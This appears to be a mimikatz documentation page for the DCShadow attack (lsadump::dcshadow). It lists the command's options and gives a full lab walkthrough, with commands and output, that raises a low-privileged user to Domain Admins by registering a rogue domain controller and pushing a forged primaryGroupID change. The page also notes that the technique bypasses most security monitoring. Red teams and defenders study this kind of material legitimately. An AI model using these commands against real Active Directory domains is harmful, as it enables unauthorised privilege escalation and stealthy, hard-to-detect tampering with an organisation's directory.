dcshadow
lsadump::dcshadow performs a DCShadow attack.
DCShadow is a feature in mimikatz located in the lsadump module. It simulates the behavior of a Domain Controller (using protocols like RPC used only by the DCs) to inject its own data, bypassing most of the common security controls and including many SIEMs. It shares some similarities with the DCSync attack lsadump::dcsync. More information for DCShadow can be found on dcshadow.com.
Command Line argument(s) to run as SYSTEM:
  • /kill: it is used when you want to delete an object
  • /object: The Distinguished Name (DN) of the Active Directory object to modify
  • /domain: the domain to target. The default is the current domain
  • /dc: the FQDN of the domain controller
  • /attribute: The name of the Active Directory Schema attribute to modify
  • /value: the object's value which is depended on the specified attribute
  • /replOriginatingUsn: The Update Sequence Number​
  • /multiple: an array of values (specifying multiple values)
  • /replOriginatingTime: As the name instructs the replication originating time. More info can be found at this guide
  • /replOriginatingUid: It specifies the UID of the domain controller which performed/requested the change. More info can be found at this guide
Command Line Argument(s) to run in push mode as Domain or Enterprise Admin:
  • /push: push the changes
  • /stack: stack the changes and then replicate them all
  • /schema: The active directory schema partition
  • /config: The active directory configuration partition
  • /root: The active directory root
  • /domain: the domain to target. The default is the current domain
  • /dc: the FQDN of the domain controller
  • /computer: The FQDN of the computer to register. The default is the computer on which DCShadow is executed.
  • /viewstack: View the stack of the changes which are going to be replicated
  • /clearstack: it clears the stack
  • /manualregister: it registers the server manually
  • /manualunregister: It unregisters the server manually
  • /manualpush: it pushes the changes manually

Escalate a domain user

In the following example the low privileged user hacklab.local\optimus will be added to the "Domain Admins" group:
1
C:\Users>net user optimus /domain
2
User name optimus
3
Full Name optimus prime
4
Comment DCShadow ROCKS
5
User's comment
6
Country/region code 000 (System Default)
7
Account active Yes
8
Account expires Never
9
​
10
Password last set 10/31/2021 2:39:23 PM
11
Password expires Never
12
Password changeable 11/1/2021 2:39:23 PM
13
Password required Yes
14
User may change password Yes
15
​
16
Workstations allowed All
17
Logon script
18
User profile
19
Home directory
20
Last logon 11/7/2021 3:32:28 PM
21
​
22
Logon hours allowed All
23
​
24
Local Group Memberships
25
Global Group memberships *Domain Users
26
The command completed successfully.
Copied!

Obtain debug privileges

From a command line opened as admin, obtain an NT AUTHORITY\SYSTEM privilege.
1
mimikatz # privilege::debug
2
Privilege '20' OK
Copied!
1
mimikatz # token::elevate
2
Token Id : 0
3
User name :
4
SID name : NT AUTHORITY\SYSTEM
5
​
6
724 {0;000003e7} 1 D 43713 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
7
-> Impersonated !
8
* Process Token : {0;0027cbc0} 2 F 3960324 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730 (12g,24p) Primary
9
* Thread Token : {0;000003e7} 1 D 28479033 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
Copied!

Modify the group id

1
mimikatz # lsadump::dcshadow /object=optimus /attribute=primaryGroupID /value=512
2
** Domain Info **
3
​
4
Domain: DC=hacklab,DC=local
5
Configuration: CN=Configuration,DC=hacklab,DC=local
6
Schema: CN=Schema,CN=Configuration,DC=hacklab,DC=local
7
dsServiceName: ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
8
domainControllerFunctionality: 7 ( WIN2016 )
9
highestCommittedUSN: 80938
10
​
11
** Server Info **
12
​
13
Server: DC.hacklab.local
14
InstanceId : {34cb3b05-57f5-4699-b037-5795637d46bf}
15
InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
16
Fake Server (not already registered): Win10.hacklab.local
17
​
18
** Attributes checking **
19
​
20
#0: primaryGroupID
21
​
22
** Objects **
23
​
24
#0: optimus
25
DN:CN=optimus prime,CN=Users,DC=hacklab,DC=local
26
primaryGroupID (1.2.840.113556.1.4.98-90062 rev 1):
27
512
28
(00020000)
29
​
30
​
31
** Starting server **
32
​
33
> BindString[0]: ncacn_ip_tcp:Win10[53586]
34
> RPC bind registered
35
> RPC Server is waiting!
36
== Press Control+C to stop ==
37
cMaxObjects : 1000
38
cMaxBytes : 0x00a00000
39
ulExtendedOp: 0
40
pNC->Guid: {9901d757-a63d-478f-a96a-f8be1a8308ac}
41
pNC->Sid : S-1-5-21-2725560159-1428537199-2260736313
42
pNC->Name: DC=hacklab,DC=local
43
SessionKey: c6aba9b6a2391d12b5f5b9b8c7cbf8d3cf0070202997d47aff1f96004638b815
44
1 object(s) pushed
45
> RPC bind unregistered
46
> stopping RPC server
47
> RPC server stopped
Copied!

Push the changes

To push the changes a second CMD with Domain or Enterprise Admin privileges must be opened:
1
mimikatz # lsadump::dcshadow /push
2
** Domain Info **
3
​
4
Domain: DC=hacklab,DC=local
5
Configuration: CN=Configuration,DC=hacklab,DC=local
6
Schema: CN=Schema,CN=Configuration,DC=hacklab,DC=local
7
dsServiceName: ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
8
domainControllerFunctionality: 7 ( WIN2016 )
9
highestCommittedUSN: 80939
10
​
11
** Server Info **
12
​
13
Server: DC.hacklab.local
14
InstanceId : {34cb3b05-57f5-4699-b037-5795637d46bf}
15
InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
16
Fake Server (not already registered): Win10.hacklab.local
17
​
18
** Performing Registration **
19
​
20
** Performing Push **
21
​
22
Syncing DC=hacklab,DC=local
23
Sync Done
24
​
25
** Performing Unregistration **
Copied!
After the successful pushing the user is now part of the "Domain Admins":
1
C:\Users\Administrator\Desktop\x64>net user optimus /domain
2
User name optimus
3
Full Name optimus prime
4
Comment DCShadow ROCKS
5
User's comment
6
Country/region code 000 (System Default)
7
Account active Yes
8
Account expires Never
9
​
10
Password last set 10/31/2021 2:39:23 PM
11
Password expires Never
12
Password changeable 11/1/2021 2:39:23 PM
13
Password required Yes
14
User may change password Yes
15
​
16
Workstations allowed All
17
Logon script
18
User profile
19
Home directory
20
Last logon 11/7/2021 3:32:28 PM
21
​
22
Logon hours allowed All
23
​
24
Local Group Memberships
25
Global Group memberships *Domain Admins
26
The command completed successfully.
Copied!
Last modified 6mo ago